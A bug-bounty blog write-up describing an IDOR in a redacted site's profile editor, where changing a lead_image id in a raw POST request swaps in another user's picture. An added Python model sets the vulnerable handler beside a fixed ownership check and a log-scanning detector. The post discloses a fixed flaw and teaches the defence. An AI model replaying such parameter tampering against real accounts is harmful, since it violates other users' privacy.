A Story of IDOR which leads to privacy violation…$$$
Hello Hackers!!
Welcome back to another of my blog posts.
This story is about an Insecure Direct Object Reference (IDOR) vulnerability. First, a short introduction to IDOR.
According to PortSwigger,
Insecure direct object references (IDOR) are a type of access control vulnerability that arises when an application uses user-supplied input to access objects directly. The term IDOR was popularized by its appearance in the OWASP 2007 Top Ten. However, it is just one example of many access control implementation mistakes that can lead to access controls being circumvented. IDOR vulnerabilities are most commonly associated with horizontal privilege escalation, but they can also arise in relation to vertical privilege escalation.
Let’s understand the scenario….
During testing, I discovered a file-upload feature. Acting as the victim, I uploaded my display picture (DP) to the web app and noticed that the request for submitting the profile carried a parameter lead_image=6109.
I then created another account as the attacker and uploaded a DP there; this time the lead_image parameter had changed to 6110.
As the attacker, I changed the parameter value from 6110 to 6109, and my DP was immediately replaced by the victim’s DP.
Request (redacted; a few header names and values were garbled in the original capture and are corrected to their standard spelling here):
POST /cms/pages/2913/edit/ HTTP/2
Host: Redacted.com
Cookie: {your cookie}
User-Agent: {your User-Agent}
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://Vulnerable.Redacted.com/cms/pages/2913/edit/
Content-Type: application/x-www-form-urlencoded
Content-Length: 240
Origin: https://Vulnerable.Redacted.com
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers

csrfmiddlewaretoken=anaiamamidw9292992 nnenfunenfnenfue93nnn&next=&slug=Attacker+profile&lead_image=6109&bio=&Location=&website=&action-submit=Submit+to+Moderators+approval
I was able to change my DP into the victim’s DP. The server checked that image 6109 existed but never verified that it belonged to the account making the request, which is exactly the missing object-level authorization check that defines an IDOR.
Thank you, hackers, for taking the time to read my write-up.
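To make the root cause concrete, here is an added example (not the vulnerable site’s code, and independent of any framework) that models the profile-edit flow above with an in-memory store: the handler that trusts the client-supplied lead_image id, the same handler with the ownership check that was missing, and a small defender-side scan that flags requests referencing an image the session user does not own. The ids 6109 (victim’s upload) and 6110 (attacker’s upload) come from the write-up; the names Image, Profile, make_store, edit_profile_vulnerable, edit_profile_fixed and find_foreign_image_references, and all other data, are assumptions constructed for this illustration.

```python
"""Stand-alone model of the profile-edit IDOR described in the write-up.

Added example, not the site's code. Function and class names are assumed;
ids 6109 (victim) and 6110 (attacker) come from the post, the rest is
constructed sample data."""
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple


class Forbidden(Exception):
    """Raised when a request references an object the caller does not own."""


@dataclass
class Image:
    id: int
    owner: str


@dataclass
class Profile:
    owner: str
    lead_image: Optional[int] = None


def make_store() -> Tuple[Dict[int, Image], Dict[str, Profile]]:
    """Fresh copy of the constructed state: each user has uploaded one picture."""
    images = {6109: Image(6109, "victim"), 6110: Image(6110, "attacker")}
    profiles = {"victim": Profile("victim", 6109),
                "attacker": Profile("attacker", 6110)}
    return images, profiles


def edit_profile_vulnerable(user: str, form: dict, images, profiles) -> Profile:
    """The IDOR pattern: the handler trusts the client-supplied lead_image id
    and checks only that the object exists, never who owns it."""
    image_id = int(form["lead_image"])
    if image_id not in images:
        raise KeyError(image_id)
    profile = profiles[user]
    profile.lead_image = image_id
    return profile


def edit_profile_fixed(user: str, form: dict, images, profiles) -> Profile:
    """Same flow with the missing object-level authorization check: the lookup
    is scoped to the requesting user, and a foreign id is rejected the same way
    as a non-existent one, so the response does not reveal whether 6109 exists."""
    image_id = int(form["lead_image"])
    image = images.get(image_id)
    if image is None or image.owner != user:
        raise Forbidden(f"user {user!r} may not reference image {image_id}")
    profile = profiles[user]
    profile.lead_image = image_id
    return profile


def find_foreign_image_references(requests: List[dict], images) -> List[dict]:
    """Defender's view: given parsed request records (constructed here as dicts
    with the session user and the submitted lead_image), return those that
    reference an image the session user does not own. Suitable for a retroactive
    hunt over access logs once the bug is known."""
    hits = []
    for rec in requests:
        img = images.get(int(rec["lead_image"]))
        if img is not None and img.owner != rec["user"]:
            hits.append(rec)
    return hits


if __name__ == "__main__":
    images, profiles = make_store()
    # The attacker resubmits the edit form with the victim's id, as in the post.
    attack_form = {"lead_image": "6109", "slug": "Attacker profile"}
    print("vulnerable:", edit_profile_vulnerable("attacker", attack_form, images, profiles))
    images, profiles = make_store()
    try:
        edit_profile_fixed("attacker", attack_form, images, profiles)
    except Forbidden as exc:
        print("fixed:", exc)
    # Constructed log records: one legitimate edit and one cross-account reference.
    log = [{"user": "victim", "lead_image": "6109"},
           {"user": "attacker", "lead_image": "6109"}]
    print("suspicious:", find_foreign_image_references(log, images))
```

In a Django application (the csrfmiddlewaretoken field suggests one), the fixed lookup is idiomatically written as get_object_or_404(Image, pk=image_id, owner=request.user), or by restricting the form field’s queryset to the current user’s images, so the ownership filter is part of the query rather than a separate check that can be forgotten.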
BUG REPORTED
STATUS FIXED
ACK. & SWAG
Special thanks to Ahmad Halabi for guiding me…